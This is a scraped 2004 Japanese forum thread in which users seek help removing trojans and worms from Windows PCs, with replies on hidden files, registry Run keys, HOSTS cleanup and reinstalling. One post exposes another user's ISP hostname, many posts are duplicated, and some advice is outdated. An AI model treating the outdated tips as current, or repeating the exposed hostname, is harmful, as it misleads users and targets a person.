C¥WINNT\downroadedPROGRAMFILES¥tl7000.DLLというファイルに
「TROJ_SOBIT.A」と言うトロイが感染していると出てきたんですが
検索をかけても該当のファイルが出てきません
再度ウィルスチェックをかけるとファイルはあることになっているのですが
どうしてでしょうか?わかる人いませんか(;´Д`)
C¥WINNT\downroadedPROGRAMFILES¥tl7000.DLLというファイルに
「TROJ_SOBIT.A」と言うトロイが感染していると出てきたんですが
検索をかけても該当のファイルが出てきません
再度ウィルスチェックをかけるとファイルはあることになっているのですが
どうしてでしょうか?わかる人いませんか(;´Д`)
>>190
「コントロールパネル(クラシック表示)」→「フォルダオプション」→「ファイルの種類」
→「新規」で「ファイルの拡張子」に「exe」を入力、詳細設定をクリックして「関連付けられているファイルの種類」で
「アプリケーション」を選んで「OK」→同じ方法で拡張子「lnk」の関連付けを「ショートカット」にする
これで大体は動く。それ以外の拡張子の関連付けも手動で直せばOK。
「コントロールパネル(クラシック表示)」→「フォルダオプション」→「ファイルの種類」
→「新規」で「ファイルの拡張子」に「exe」を入力、詳細設定をクリックして「関連付けられているファイルの種類」で
「アプリケーション」を選んで「OK」→同じ方法で拡張子「lnk」の関連付けを「ショートカット」にする
これで大体は動く。それ以外の拡張子の関連付けも手動で直せばOK。
>>216
あ、ちなみに当方のマシンはxpなので、それ以外だったら知りません。
あ、ちなみに当方のマシンはxpなので、それ以外だったら知りません。
218 :名無しさん@お腹いっぱい。:04/09/14 08:29:44
XPです。
どこかのサイトの掲示板からウイルスをもらってしまいました・・・
ファイル名は確か、「clash me」だったと思います。
ノートン先生で「検疫しました」と出たのですが、これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?
どこかのサイトの掲示板からウイルスをもらってしまいました・・・
ファイル名は確か、「clash me」だったと思います。
ノートン先生で「検疫しました」と出たのですが、これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?
219 :218:04/09/14 08:31:50
すみません。ウイルス名は
Troja Ho・・・何とかでした。
Troja Ho・・・何とかでした。
220 :名無しさん@お腹いっぱい。:04/09/14 08:41:26
>>218-219
まずマニュアル読め。次にぐぐれ。それでも解らなければシマンテックに聞け。
お前の書いた内容は、以下と同じ。こんなんで誰が判るんだ?
「今日、田中って人が来たけど、犬が吠えたから追い返しました。
これって悪徳業者から身を守ったと考えてよろしいのでしょうか?
会社名は・・・何とか有限会社でした」
まずマニュアル読め。次にぐぐれ。それでも解らなければシマンテックに聞け。
お前の書いた内容は、以下と同じ。こんなんで誰が判るんだ?
「今日、田中って人が来たけど、犬が吠えたから追い返しました。
これって悪徳業者から身を守ったと考えてよろしいのでしょうか?
会社名は・・・何とか有限会社でした」
221 :名無しさん@お腹いっぱい。:04/09/14 08:57:33
>>220
ワラタ でもまぁそんな感じつっても過言じゃねーな
Trojan Horse(=トロイの木馬)はウィルスの種類の通称なので、それじゃわからないよ
ノートンならシマンテックHPのウィルス辞典で調べてみるといいんじゃねーの?
ワラタ でもまぁそんな感じつっても過言じゃねーな
Trojan Horse(=トロイの木馬)はウィルスの種類の通称なので、それじゃわからないよ
ノートンならシマンテックHPのウィルス辞典で調べてみるといいんじゃねーの?
222 :名無しさん@お腹いっぱい。:04/09/14 09:50:11
>215
フォルダオプションで「すべてのファイルとフォルダを表示する」にチェック
「保護されたオペレーティングシステムファイルを表示しない」のチェックを外す
で、検出されたファイルを削除
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SOBIT.A
ここみてレジストリ修復
それからアンチウイルスソフトくらい入れとけ
フォルダオプションで「すべてのファイルとフォルダを表示する」にチェック
「保護されたオペレーティングシステムファイルを表示しない」のチェックを外す
で、検出されたファイルを削除
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SOBIT.A
ここみてレジストリ修復
それからアンチウイルスソフトくらい入れとけ
223 :名無しさん@お腹いっぱい。:04/09/14 13:30:40
>>220
219は、
>「検疫しました」と出たのですが、これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?
の部分を聞きたいのでは?
「Troja Ho・・・何とか」がウイルスか否かではなく。
219は、
>「検疫しました」と出たのですが、これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?
の部分を聞きたいのでは?
「Troja Ho・・・何とか」がウイルスか否かではなく。
224 :名無しさん@お腹いっぱい。:04/09/14 13:34:38
つまり田中さんが帰ったかどうかを(ry
225 :名無しさん@お腹いっぱい。:04/09/14 13:36:17
226 :名無しさん@お腹いっぱい。:04/09/14 14:47:43
AVGで検索かけるとWarning: Hidden extension .exe
ってでて何度AVGで修復かけても引っかかるんですが
やっぱ感染してるんですか?
ってでて何度AVGで修復かけても引っかかるんですが
やっぱ感染してるんですか?
227 :名無しさん@お腹いっぱい。:04/09/14 15:04:58
228 :名無しさん@お腹いっぱい。:04/09/14 17:31:59
【使用OS、WindowsUpdateの有無】 ME、していない
【オンラインスキャンの結果】
(ウィルス名) TROJ_AOLPS.NM
(場所)
c:\ProgramFiles\InternetExplorer\○○.exe (すぐ消したので○○の部分は忘れました)
c:\_Restore\TEMP\A0127243.cpy
【症状】 exeファイルは8/24に作成されていました。
たまたまスキャンで見つけたので、自覚症状はありません・・・
【これまでにとった措置】
exeファイルを削除しました。
ウィルス検索でなかったので、似たような名前のTROJ_AOLERSERというのを参考に、
レジストリを調べましたが、特に異常はないようです。
ただ、c:\_Restore\TEMP\A0127243.cpy が”現在使用している”として削除できません。
何かいい方法はないでしょうか?
【オンラインスキャンの結果】
(ウィルス名) TROJ_AOLPS.NM
(場所)
c:\ProgramFiles\InternetExplorer\○○.exe (すぐ消したので○○の部分は忘れました)
c:\_Restore\TEMP\A0127243.cpy
【症状】 exeファイルは8/24に作成されていました。
たまたまスキャンで見つけたので、自覚症状はありません・・・
【これまでにとった措置】
exeファイルを削除しました。
ウィルス検索でなかったので、似たような名前のTROJ_AOLERSERというのを参考に、
レジストリを調べましたが、特に異常はないようです。
ただ、c:\_Restore\TEMP\A0127243.cpy が”現在使用している”として削除できません。
何かいい方法はないでしょうか?
229 :名無しさん@お腹いっぱい。:04/09/14 18:02:56
230 :名無しさん@お腹いっぱい。:04/09/14 18:14:54
>228
> ウィルス検索でなかったので、似たような名前のTROJ_AOLERSERというのを参考に、
そういうときは似た名前じゃなくて同じウイルスの亜種を探すべし
そうするとNYとかNRとかでてくる…が、ろくな情報がないようだ
念のためWin.iniのRunもチェックして見れ
> ウィルス検索でなかったので、似たような名前のTROJ_AOLERSERというのを参考に、
そういうときは似た名前じゃなくて同じウイルスの亜種を探すべし
そうするとNYとかNRとかでてくる…が、ろくな情報がないようだ
念のためWin.iniのRunもチェックして見れ
231 :228:04/09/14 18:17:03
232 :名無しさん@お腹いっぱい。:04/09/14 20:08:48
【使用OS、WindowsUpdateの有無】 XP、最新
【スキャンした結果(ウイルス名・発見場所)】
Trojan.Ecure (C:\WINDOWS\system.exe)
Dialer.Trojan (C:\WINDOWS\seksdialer.exe )
Trojan.ByteVerify (C:\Documents and Settings\〜\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\loaderms.jar-108db11b-6384d35c.zip) 内の (Counter.class) )
の三つを検出。
全て自動的に削除。
【症状】
ウィルスはスキャンしても検出されなくなったのですが、フォルダを開いたり、
IEを起動すると一瞬で閉じてしまいます。ファイル・フォルダの検索も同様に一瞬で閉じます。
【これまでにとった措置】
駄目もとでシステムの復元をしましたが、何も変わりませんでした。
IEも開けないしファイルの検索も出来ないのでどうすればいいのやら・・・
Wordやら2chブラウザは普通に使えるのですが。
【スキャンした結果(ウイルス名・発見場所)】
Trojan.Ecure (C:\WINDOWS\system.exe)
Dialer.Trojan (C:\WINDOWS\seksdialer.exe )
Trojan.ByteVerify (C:\Documents and Settings\〜\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\loaderms.jar-108db11b-6384d35c.zip) 内の (Counter.class) )
の三つを検出。
全て自動的に削除。
【症状】
ウィルスはスキャンしても検出されなくなったのですが、フォルダを開いたり、
IEを起動すると一瞬で閉じてしまいます。ファイル・フォルダの検索も同様に一瞬で閉じます。
【これまでにとった措置】
駄目もとでシステムの復元をしましたが、何も変わりませんでした。
IEも開けないしファイルの検索も出来ないのでどうすればいいのやら・・・
Wordやら2chブラウザは普通に使えるのですが。
233 :名無しさん@お腹いっぱい。:04/09/14 21:57:02
スパイウェアかウィルスにやられたらしく、起動後すぐ固まってしまいなにもできない。
めんどくさいからリカバリーしようかと思ったら、CDも動かない。
どうすればよいんでしょ?
めんどくさいからリカバリーしようかと思ったら、CDも動かない。
どうすればよいんでしょ?
234 :名無しさん@お腹いっぱい。:04/09/14 22:18:22
235 :名無しさん@お腹いっぱい。:04/09/15 01:19:35
>233
まるち
まるち
236 :名無しさん@お腹いっぱい。:04/09/15 11:57:48
>232
とりあえずTrojan.Ecureの処置として
・IEのスタートページを戻す
・HOSTSファイルの「127.0.0.1 localhost」以外の行を削除
これやってからセーフモードとネットワーク(だっけ?)で起動
これでIEが立ち上がるようならTrendmicroかMcAfeeでオンラインスキャン
スパイウェア駆除ツールもいくつか試してみる
とりあえずTrojan.Ecureの処置として
・IEのスタートページを戻す
・HOSTSファイルの「127.0.0.1 localhost」以外の行を削除
これやってからセーフモードとネットワーク(だっけ?)で起動
これでIEが立ち上がるようならTrendmicroかMcAfeeでオンラインスキャン
スパイウェア駆除ツールもいくつか試してみる
237 :名無しさん@お腹いっぱい。:04/09/15 12:09:29
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
にある Microsoft Update Machine Winregs32 ってウィルス?
にある Microsoft Update Machine Winregs32 ってウィルス?
238 :名無しさん@お腹いっぱい。:04/09/15 13:55:10
239 :名無しさん@お腹いっぱい。:04/09/15 14:55:41
I.E立ち上げるとorgazmってのが落ちてきてエロ画像行っちゃう。ヤフーに設定すると戻るけど再起動すると
また来る。プログラムのorgazm exe消しても直りません。どうしたら良いのでしょうか?
また来る。プログラムのorgazm exe消しても直りません。どうしたら良いのでしょうか?
240 :名無しさん@お腹いっぱい。:04/09/15 15:02:46
>>239
アンチウィルスソフトいれるのと、スパイウェアのチェックをSpybot+Ad-awareSEでやってみろ
アンチウィルスソフトいれるのと、スパイウェアのチェックをSpybot+Ad-awareSEでやってみろ
241 :239:04/09/15 15:33:06
スパイウェアって何でしょうか?すみません。教えてください
242 :名無しさん@お腹いっぱい。:04/09/15 15:33:22
243 :239:04/09/15 15:59:52
携帯について調べてたら行ってしまいました。
すみませんがお願いです。
すみませんがお願いです。
244 :名無しさん@お腹いっぱい。:04/09/15 16:10:57
245 :239:04/09/15 21:14:21
スパイウェアのチェックをSpybot+Ad-awareSEでしましたがダメでした。
どうすれば・・・・・
どうすれば・・・・・
246 :名無しさん@お腹いっぱい。:04/09/15 21:22:59
>>245
コッチの方が情報あり
エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/l50
まず、テンプレよ〜く嫁。読んで、実行して、それでもわからない場合に質問汁。
(ちょっと荒れ気味だ品・・・)
コッチの方が情報あり
エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/l50
まず、テンプレよ〜く嫁。読んで、実行して、それでもわからない場合に質問汁。
(ちょっと荒れ気味だ品・・・)
247 :名無しさん@お腹いっぱい。:04/09/15 22:51:18
僕の肛門がグラッカーにやられそうなのですが、どうすればいいですか?
一応ウイルスバスター2004と、スパイウェア除去ソフト、免疫ソフトを使っています。
最近、肛門のしまりが悪くなってきたので、侵入を許してしまうのではないかと、不安になってます。
一応ウイルスバスター2004と、スパイウェア除去ソフト、免疫ソフトを使っています。
最近、肛門のしまりが悪くなってきたので、侵入を許してしまうのではないかと、不安になってます。
248 :名無しさん@お腹いっぱい。:04/09/15 22:51:25
windows2000sp4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
の値が「きみはじつにばかだな。」になっていました。
これはマイコンピュータ→右クリック→プロパティ→全般タブに表示される値の一つです。
いろいろ検索かけたりしたのですが見つからず、NAVで完全スキャンをかけても戻らず
これは何だったのでしょう?
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
の値が「きみはじつにばかだな。」になっていました。
これはマイコンピュータ→右クリック→プロパティ→全般タブに表示される値の一つです。
いろいろ検索かけたりしたのですが見つからず、NAVで完全スキャンをかけても戻らず
これは何だったのでしょう?
249 :名無しさん@お腹いっぱい。:04/09/15 22:53:08
あつかましいお願いで申し訳ありませんが、
どなたか教えてもらえませんか?友人からの依頼品などもあり
どうしてもせっぱつまっているのです。
本当に感謝しますので、どうかお願い!
どなたか教えてもらえませんか?友人からの依頼品などもあり
どうしてもせっぱつまっているのです。
本当に感謝しますので、どうかお願い!
251 :名無しさん@お腹いっぱい。:04/09/15 23:20:42
252 :名無しさん@お腹いっぱい。:04/09/15 23:23:33
これって事実上の荒し依頼だよな?>スパム
削除依頼+アク禁対象じゃないか?
削除依頼+アク禁対象じゃないか?
253 :名無しさん@お腹いっぱい。:04/09/15 23:28:12
254 :名無しさん@お腹いっぱい。:04/09/15 23:56:32
教えて下さい。
ヤフーのフリーメールの方に、度々
W32.Netsky.P@mmという名前のウイルスを含んだメールが
添付されて送りつけられます。
受信拒否にしても、迷惑メールフォルダの方に受信されてしまいます。
どうしたら、よいでしょうか?教えて下さい。
ヤフーのフリーメールの方に、度々
W32.Netsky.P@mmという名前のウイルスを含んだメールが
添付されて送りつけられます。
受信拒否にしても、迷惑メールフォルダの方に受信されてしまいます。
どうしたら、よいでしょうか?教えて下さい。
255 :名無しさん@お腹いっぱい。:04/09/16 00:05:21
256 :名無しさん@お腹いっぱい。:04/09/16 00:09:15
257 :名無しさん@お腹いっぱい。:04/09/16 02:35:53
【使用OS、WindowsUpdateの有無】
XP pro Ver2002 SP1適用 当時FWは切っていました。。
現在は反省してFWかけています
【使用AntiVirus、Updateの有無】
ノートン アンチ ウィルス 9/14日付けの物に更新
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
合計25個程度同時にかかっていたので全て把握できませんでした
大抵の物は既に駆除出来ていると思います
現在自覚のある中でかかっているらしきものは「W32.Klez.gen@mm」、
「W32.ElKern.gen」の2種です
【症状】(具体的に、分かる限りすべて書くこと。何をしたらそんなことになったのかも)
最初はデスクトップのゴミ箱のアイコンを右クリックするとエクスプローラがフリーズする、
タスクマネージャが一瞬立ち上がった後すぐに自動的に終了してしまう、
MSNメッセンジャやIRCが今までにないような頻度で切断される という感じでした
その後症状を元にググって見た結果、klezというのに類似しているように見受けられたので
シマンテックのサイトの下記「W32.Klez駆除ツール」を実行すると
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html
「Neither W32.Klez.gen@mm nor W32.ElKern.gen were found on your computer.」
との結果が出て、その後それまでは普通に実行できていたはずのレジストリエディタまで
立ち上がらなくなりました
原因のほうはいつの間にかなってしまったので把握できていません
【これまでにとった措置】
NAV、AD-awareでのスキャン、klez用駆除ツール
自分ではこれで精一杯でした。。
どうかお知恵をお貸し下さい
XP pro Ver2002 SP1適用 当時FWは切っていました。。
現在は反省してFWかけています
【使用AntiVirus、Updateの有無】
ノートン アンチ ウィルス 9/14日付けの物に更新
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
合計25個程度同時にかかっていたので全て把握できませんでした
大抵の物は既に駆除出来ていると思います
現在自覚のある中でかかっているらしきものは「W32.Klez.gen@mm」、
「W32.ElKern.gen」の2種です
【症状】(具体的に、分かる限りすべて書くこと。何をしたらそんなことになったのかも)
最初はデスクトップのゴミ箱のアイコンを右クリックするとエクスプローラがフリーズする、
タスクマネージャが一瞬立ち上がった後すぐに自動的に終了してしまう、
MSNメッセンジャやIRCが今までにないような頻度で切断される という感じでした
その後症状を元にググって見た結果、klezというのに類似しているように見受けられたので
シマンテックのサイトの下記「W32.Klez駆除ツール」を実行すると
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html
「Neither W32.Klez.gen@mm nor W32.ElKern.gen were found on your computer.」
との結果が出て、その後それまでは普通に実行できていたはずのレジストリエディタまで
立ち上がらなくなりました
原因のほうはいつの間にかなってしまったので把握できていません
【これまでにとった措置】
NAV、AD-awareでのスキャン、klez用駆除ツール
自分ではこれで精一杯でした。。
どうかお知恵をお貸し下さい
すいません
記載に漏れがありました
WinUpdateも最新のまで入れてあります
このWinUpdateする際にも、何度自動更新しても同じファイルを落とし続けるので
MSのサイトから直接ファイルをDLして手動インストールしてみたところ
インストール実行中にウィザードが強制終了してしまっていました
その問題はセーフモードでインストールを実行することで回避出来ました
記載に漏れがありました
WinUpdateも最新のまで入れてあります
このWinUpdateする際にも、何度自動更新しても同じファイルを落とし続けるので
MSのサイトから直接ファイルをDLして手動インストールしてみたところ
インストール実行中にウィザードが強制終了してしまっていました
その問題はセーフモードでインストールを実行することで回避出来ました
259 :名無しさん@お腹いっぱい。:04/09/16 02:58:37
皆さん相談に乗ってください。
知り合いがパソコンを買う予定なのですが、金が無いらしいので、
中古のOS 2000 良くてもペン3の500とか、メモリもまあ128とか256ぐらいになると思います。
ネットと、メールぐらいしかしないらしいので、それぐらいでも十分かなーと思いますが、
ノートンとか、バスターを入れると、スペック的な厳しさの心配があり、
さらにパソコン触った事無いぐらいの人なので、設定の仕方とかも良く分からなそうです。
だからセキュ的には、やっすいルーターと、プロバイダーのウィルスチェックで何とかなるかなーと思ってるのですが、
甘いっすかね?
知り合いがパソコンを買う予定なのですが、金が無いらしいので、
中古のOS 2000 良くてもペン3の500とか、メモリもまあ128とか256ぐらいになると思います。
ネットと、メールぐらいしかしないらしいので、それぐらいでも十分かなーと思いますが、
ノートンとか、バスターを入れると、スペック的な厳しさの心配があり、
さらにパソコン触った事無いぐらいの人なので、設定の仕方とかも良く分からなそうです。
だからセキュ的には、やっすいルーターと、プロバイダーのウィルスチェックで何とかなるかなーと思ってるのですが、
甘いっすかね?
260 :名無しさん@お腹いっぱい。:04/09/16 03:15:00
>>257
「Neither W32.Klez.gen@mm nor W32.ElKern.gen were found on your computer.」
これはKlezが駆除できたというメッセージ
メッセンジャー・IRCの症状はKlezだろうけど、エクスプローラやタスクマネージャのほうは
おそらくトロイによるものだと推測
25個もの感染があったなら、その中にはレジストリを改変するものも含まれてたんじゃないかな
そういう場合は手動で書き換えられたレジストリを元に戻さなければいけないわけで
もう原因が特定できない状態だから、OS再インストールしたほうが早い
この板のHijackThisスレかPC初心者のエロサイトスレでログを見て貰うという手もあるけど、
それで元通りになるとは限らない
無駄に時間使うだけになるかもしれないし
「Neither W32.Klez.gen@mm nor W32.ElKern.gen were found on your computer.」
これはKlezが駆除できたというメッセージ
メッセンジャー・IRCの症状はKlezだろうけど、エクスプローラやタスクマネージャのほうは
おそらくトロイによるものだと推測
25個もの感染があったなら、その中にはレジストリを改変するものも含まれてたんじゃないかな
そういう場合は手動で書き換えられたレジストリを元に戻さなければいけないわけで
もう原因が特定できない状態だから、OS再インストールしたほうが早い
この板のHijackThisスレかPC初心者のエロサイトスレでログを見て貰うという手もあるけど、
それで元通りになるとは限らない
無駄に時間使うだけになるかもしれないし
261 :名無しさん@お腹いっぱい。:04/09/16 03:26:29
デスクトップの背景が蓮画像になったのですが、
こちらで質問させてもらってよろしいでしょうか?
All userのスタートアップの所に” .exe”という
怪しいファイルを見つけたのですが、これが犯人と思ってよろしいのでしょうか?
ちなみにwinnyは使ってないです。
オンラインスキャンをしても反応しませんでした。
ググるためのヒント(正式名称)などを教えていただけたらと思います。
こちらで質問させてもらってよろしいでしょうか?
All userのスタートアップの所に” .exe”という
怪しいファイルを見つけたのですが、これが犯人と思ってよろしいのでしょうか?
ちなみにwinnyは使ってないです。
オンラインスキャンをしても反応しませんでした。
ググるためのヒント(正式名称)などを教えていただけたらと思います。
262 :名無しさん@お腹いっぱい。:04/09/16 03:27:32
>>259
甘い
初心者に限って何でもパカパカリンク踏むもんだし、
ウィルス感染は何もメールだけに限ったものではない
設定の仕方も解らない人間なら、ネットに繋いだ瞬間にsasser等に感染するのがオチ
感染したら本人だけの問題ではない、周りも迷惑こうむるし
そのスペックなら厳しいけども、ノートン、バスターともに入れられないわけじゃないでしょ
私が最初に使ってたPCがそれとよく似たスペック(OS2000 K-6 550 メモリ256)で
Norton Anti Virus と Black ICE が入ってた
男性ならエロサイト巡りは絶対と言っていいほどするだろうし、
少々の重さを我満してもセキュリティ対策は取っておいたほうがいいと思う
甘い
初心者に限って何でもパカパカリンク踏むもんだし、
ウィルス感染は何もメールだけに限ったものではない
設定の仕方も解らない人間なら、ネットに繋いだ瞬間にsasser等に感染するのがオチ
感染したら本人だけの問題ではない、周りも迷惑こうむるし
そのスペックなら厳しいけども、ノートン、バスターともに入れられないわけじゃないでしょ
私が最初に使ってたPCがそれとよく似たスペック(OS2000 K-6 550 メモリ256)で
Norton Anti Virus と Black ICE が入ってた
男性ならエロサイト巡りは絶対と言っていいほどするだろうし、
少々の重さを我満してもセキュリティ対策は取っておいたほうがいいと思う
263 :名無しさん@お腹いっぱい。:04/09/16 03:32:39
>>259
甘い。
アンチウィルスソフトも、ファイヤーウォールも、スパイウェア対策ソフトも
全部無料で手に入れられる時代だ。最低限でもそのぐらいは入れた方がいい。
セキュリティ板のスレッドを回って情報を集めた方がいいよ
甘い。
アンチウィルスソフトも、ファイヤーウォールも、スパイウェア対策ソフトも
全部無料で手に入れられる時代だ。最低限でもそのぐらいは入れた方がいい。
セキュリティ板のスレッドを回って情報を集めた方がいいよ
264 :名無しさん@お腹いっぱい。:04/09/16 03:33:24
>>261
キンタマかぬるぽだと思うけど、ダウンロード板のこのスレ読んだほうが情報多いと思う
【警報】Winnyを狙ったワーム・ウイルス情報 Part26
http://tmp4.2ch.net/test/read.cgi/download/1094872215/
今この時間このスレにいるのは、夜中に目が覚めた私ひとりだし、私は治し方を知らないから
キンタマかぬるぽだと思うけど、ダウンロード板のこのスレ読んだほうが情報多いと思う
【警報】Winnyを狙ったワーム・ウイルス情報 Part26
http://tmp4.2ch.net/test/read.cgi/download/1094872215/
今この時間このスレにいるのは、夜中に目が覚めた私ひとりだし、私は治し方を知らないから
265 :名無しさん@お腹いっぱい。:04/09/16 03:39:58
>>264
どうみても>>261はネタだろ。本当に知らなかったらこんな事書かない
>ちなみにwinnyは使ってないです。
>ちなみにwinnyは使ってないです。
>ちなみにwinnyは使ってないです。
Winnyやってないなら訳のわからないものをダウンロードするからだ
スレ違いだと最初からわかってるか、nyやってて感染して聞いてるだけだろ
ここでは誰も回答する気も起きないと思うよ、あきらめな
どうみても>>261はネタだろ。本当に知らなかったらこんな事書かない
>ちなみにwinnyは使ってないです。
>ちなみにwinnyは使ってないです。
>ちなみにwinnyは使ってないです。
Winnyやってないなら訳のわからないものをダウンロードするからだ
スレ違いだと最初からわかってるか、nyやってて感染して聞いてるだけだろ
ここでは誰も回答する気も起きないと思うよ、あきらめな
266 :名無しさん@お腹いっぱい。:04/09/16 10:14:31
>>261
蓮の犯人はここに登録されているファイルです
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
: imjpmig
蓮の犯人はここに登録されているファイルです
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
: imjpmig
267 :名無しさん@お腹いっぱい。:04/09/16 10:18:15
268 :名無しさん@お腹いっぱい。:04/09/16 10:54:53
>>257
>合計25個程度同時にかかっていたので全て把握できませんでした
NAVによってスキャンしたのなら
レポート→活動ログ→Norton AntiVirus→脅威警告
にそのときのログが残っているはずだけど。
>合計25個程度同時にかかっていたので全て把握できませんでした
NAVによってスキャンしたのなら
レポート→活動ログ→Norton AntiVirus→脅威警告
にそのときのログが残っているはずだけど。
269 :261:04/09/16 11:19:34
270 :名無しさん@お腹いっぱい。:04/09/16 11:38:27
違う違う!
ここにはすごいスキルのありそうな人が
多いのでお願いしているのです。
ぶっちゃけた話、自分の周りに東大の工学部を
出ているような人は誰もいません。
でもここにはそれ以上の頭脳とスキルを持ったツワモノが
潜んでいると思うのです。何故なら
このお願い事は東大の工学部でも難しいレベルだと思うからです。
ここにはすごいスキルのありそうな人が
多いのでお願いしているのです。
ぶっちゃけた話、自分の周りに東大の工学部を
出ているような人は誰もいません。
でもここにはそれ以上の頭脳とスキルを持ったツワモノが
潜んでいると思うのです。何故なら
このお願い事は東大の工学部でも難しいレベルだと思うからです。
272 :名無しさん@お腹いっぱい。:04/09/16 11:59:32
273 :名無しさん@お腹いっぱい。:04/09/16 12:07:08
274 :名無しさん@お腹いっぱい。:04/09/16 13:22:03
1.島を手に入れる
2.独立を宣言する
3.国外へのインターネット回線を引く
4.メールサーバを島に置く
5.メールを出す
2.独立を宣言する
3.国外へのインターネット回線を引く
4.メールサーバを島に置く
5.メールを出す
276 :名無しさん@お腹いっぱい。:04/09/16 16:05:36
Symantec NortonInternetSecurity2005日本語版ついにアクチ機能導入?
http://www.symantec.com/region/jp/news/year04/040916c.html
>また、ユーザーを海賊版コピーや偽造ソフトウェアから守るため、
>ノートン 2005 シリーズの製品より製品のアクティブ化の技術が搭載
>されています。
http://www.symantec.com/region/jp/news/year04/040916c.html
>また、ユーザーを海賊版コピーや偽造ソフトウェアから守るため、
>ノートン 2005 シリーズの製品より製品のアクティブ化の技術が搭載
>されています。
277 :名無しさん@お腹いっぱい。:04/09/16 18:02:20
海賊版コピーからユーザーを守るってどういうこと?
278 :名無しさん@お腹いっぱい。:04/09/16 18:18:58
279 :名無しさん@お腹いっぱい。:04/09/16 18:20:41
教えて下さい。
うちのPC、夜中になると勝手に家中動き回ってるみたいなんですが
どうしたらいいでしょうか?
うちのPC、夜中になると勝手に家中動き回ってるみたいなんですが
どうしたらいいでしょうか?
280 :名無しさん@お腹いっぱい。:04/09/16 18:33:15
≫279
縛っとけ!
縛っとけ!
281 :名無しさん@お腹いっぱい。:04/09/16 18:46:40
282 :名無しさん@お腹いっぱい。:04/09/16 18:57:27
相談させてください。ウィルスメール(W32.Netsky.P)が日に10通ちかく
届くようになり、ヘッダからプロバイダを割り出して、ヘッダ情報を添えて
該当プロバイダに連絡しました。
返事がきたのですが、
・同一IPを多くの人が使っているからウィルス感染者はわからない
・このヘッダも偽装かもしれないから信用できない
・全ユーザーにウィルスに気をつけるよう注意を促すようにはする
ということで、何の対処もしてもらえないようです。
こういう無責任プロバイダを取り締まってくれるような団体ってないですかね?
届くようになり、ヘッダからプロバイダを割り出して、ヘッダ情報を添えて
該当プロバイダに連絡しました。
返事がきたのですが、
・同一IPを多くの人が使っているからウィルス感染者はわからない
・このヘッダも偽装かもしれないから信用できない
・全ユーザーにウィルスに気をつけるよう注意を促すようにはする
ということで、何の対処もしてもらえないようです。
こういう無責任プロバイダを取り締まってくれるような団体ってないですかね?
283 :名無しさん@お腹いっぱい。:04/09/16 19:02:48
10通/日程度で騒ぐことか?
284 :名無しさん@お腹いっぱい。:04/09/16 19:18:32
285 :名無しさん@お腹いっぱい。:04/09/16 19:53:34
そこにメール欄があるからじゃない?
あぼーん
c124248.net21845.cablenet.ne.jp
↑厨のip
↑厨のip
288 :名無しさん@お腹いっぱい。:04/09/16 21:38:14
質問させてください。この11月でセキュリティーソフトの更新サービス
が切れるのですが、今使ってるのがノートンインターネットセキュリティ
2003なんで新しいパッケージのやつに買い換えなきゃどうなのか悩んでます。
そこらへんに詳しい方どうしたらいいかおしえてください
が切れるのですが、今使ってるのがノートンインターネットセキュリティ
2003なんで新しいパッケージのやつに買い換えなきゃどうなのか悩んでます。
そこらへんに詳しい方どうしたらいいかおしえてください
289 :名無しさん@お腹いっぱい。:04/09/16 21:51:14
290 :名無しさん@お腹いっぱい。:04/09/16 21:57:59
>>289
サービス延長キーを買うか、2005に買い換えるか、どっちがいいんでしょうか?
2003でも問題なければまた延長キーを買おうと思ってます。更新が2回目だったので
皆さんどうされてるのかと思いまして。
サービス延長キーを買うか、2005に買い換えるか、どっちがいいんでしょうか?
2003でも問題なければまた延長キーを買おうと思ってます。更新が2回目だったので
皆さんどうされてるのかと思いまして。
291 :名無しさん@お腹いっぱい。:04/09/16 22:09:24
>>290
どうせ買うなら 2005にしてみれば。
どうせ買うなら 2005にしてみれば。
292 :名無しさん@お腹いっぱい。:04/09/16 22:29:27
Windows 2000 で、ログイン画面が逆さまになって、ログインするとデスクトップも逆さまになってしまった。
こんなウイルスある?
こんなウイルスある?
293 :名無しさん@お腹いっぱい。:04/09/16 22:32:15
すいません、ウィルスで教えてもらいたいのですが、
さっきNorton AntiVirusでwinfix3というウィルスを発見したんです。
強制終了すれば消せると思い、
Alt+Ctrl+Deleteでwinfix3のタスクマネージャでプロセスを終了したんですが、
winfix3が起動していて消せません;-:
どうやったらwinfix3を消せるんでしょうか?
あとwinfix3に関係しているファイルがあるんでしょうか?
消したいので教えてください!お願いしますm_m
さっきNorton AntiVirusでwinfix3というウィルスを発見したんです。
強制終了すれば消せると思い、
Alt+Ctrl+Deleteでwinfix3のタスクマネージャでプロセスを終了したんですが、
winfix3が起動していて消せません;-:
どうやったらwinfix3を消せるんでしょうか?
あとwinfix3に関係しているファイルがあるんでしょうか?
消したいので教えてください!お願いしますm_m
294 :名無しさん@お腹いっぱい。:04/09/16 22:32:31
295 :名無しさん@お腹いっぱい。:04/09/16 22:34:51
296 :名無しさん@お腹いっぱい。:04/09/16 22:40:28
297 :名無しさん@お腹いっぱい。:04/09/16 22:49:12
>>292
こんなのがあった
http://www2.sega.co.jp/bbs/article/p/pc/351/qpycxe/miikkz.html#miikkz
そういう機能が付いたPCなのかもしれない
とりあえず取説読んでみたほうがいいかもね
こんなのがあった
http://www2.sega.co.jp/bbs/article/p/pc/351/qpycxe/miikkz.html#miikkz
